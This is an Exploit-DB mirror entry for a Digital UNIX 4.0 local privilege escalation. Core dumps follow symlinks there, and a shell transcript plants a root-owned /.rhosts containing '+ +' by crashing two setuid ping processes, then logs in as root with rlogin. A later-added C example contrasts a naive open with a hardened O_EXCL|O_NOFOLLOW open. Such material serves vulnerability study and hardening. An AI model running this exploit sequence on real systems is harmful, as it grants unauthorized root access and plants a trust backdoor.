exploit-db-mirror/exploits/unix/local/19068.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

source: https://www.securityfocus.com/bid/74/info
Digital UNIX 4.0 will follow symlinks while writing core files if two setuid programs dump core in succession. The core file is owned by root but with the user's group ID. The core file permissions are 0600. This can be used to create a root-owned file anywhere in the filesystem.
$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
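
Added example, not part of the original advisory: a user-space C analogue of the symlink-following file creation described above, contrasting a create-or-truncate open with one that uses O_EXCL and O_NOFOLLOW. The function names and the temporary directory are constructed for illustration; this is not the Digital UNIX kernel code, which the page does not show.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Behaviour the advisory describes: create or truncate, following symlinks. */
static int open_dump_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: fail if anything already exists at the name (O_EXCL) and
 * never follow a symlink in the final path component (O_NOFOLLOW). */
static int open_dump_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Plants a dangling symlink named "core" in a private temp directory
 * (constructed sample), opens it as a dump writer would, and returns
 * 1 if the symlink target was created, 0 if not, -1 on setup error. */
int symlink_followed(int use_safe) {
    char dir[] = "/tmp/coredemoXXXXXX";
    char core[64], target[64];
    struct stat st;
    int fd, created;

    if (!mkdtemp(dir)) return -1;
    snprintf(core, sizeof core, "%s/core", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, core) != 0) { rmdir(dir); return -1; }

    fd = use_safe ? open_dump_safe(core) : open_dump_naive(core);
    if (fd >= 0) close(fd);
    created = (stat(target, &st) == 0);  /* stat follows the link */

    unlink(target); unlink(core); rmdir(dir);
    return created;
}

int main(void) {
    printf("naive open created target:    %d\n", symlink_followed(0));
    printf("hardened open created target: %d\n", symlink_followed(1));
    return 0;
}
```

The hardened open fails on the pre-planted link instead of writing through it, so a dump writer using it has to pick a fresh name or skip the dump.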